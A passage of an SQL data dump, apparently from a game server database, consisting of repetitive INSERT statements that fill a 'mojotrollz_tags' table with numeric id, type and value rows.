'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11982, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11982, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11982, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11983, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11983, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11983, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11988, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11988, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11988, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11994, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11994, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11996, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11997, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11997, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11997, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11998, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11998, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12017, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12017, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12017, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12018, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12019, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12019, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12021, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12021, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12022, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12022, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12023, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12023, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12024, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12025, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12026, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12027, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12028, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12029, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12030, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12030, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12031, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12032, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12033, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12034, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12034, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12034, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12034, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12037, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12037, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12042, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12043, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12045, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12046, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12047, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12048, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12048, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12050, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12050, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12051, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12051, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12052, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12052, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12053, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12053, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12056, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12056, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12056, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12057, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12057, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12057, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12076, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12076, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12076, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12096, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12096, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12097, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12097, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12097, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12098, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12098, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12098, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12099, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12099, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12099, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12100, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12100, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12100, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12101, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12101, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12101, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12116, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12118, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12118, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12118, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12119, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12119, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12119, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12121, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12121, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12121, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12122, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12122, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12122, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12123, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12124, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12125, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12126, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12127, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12127, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12127, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12128, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12129, 1, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12129, 1, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12129, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12136, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12136, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12136, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12136, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12136, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12137, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12137, 1, 2, 33, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12137, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12137, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12137, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12141, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12143, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12145, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12148, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12149, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12150, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12152, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12156, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12157, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12157, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12157, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12158, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12159, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12159, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12159, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12160, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12178, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12178, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12179, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12179, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12196, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12197, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12197, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12198, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12201, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12201, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12201, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12202, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12203, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12203, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12203, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12206, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12206, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12206, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12207, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12207, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12207, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12208, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12216, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12216, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12217, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12217, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12218, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12218, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12219, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12219, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12219, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12220, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12220, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12220, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12221, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12221, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12221, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12222, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12222, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12222, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12223, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12223, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12223, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12224, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12224, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12224, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12225, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12225, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12225, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12236, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12236, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12236, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12237, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12238, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12239, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12239, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12240, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12240, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12241, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12241, 1, 30, 1, 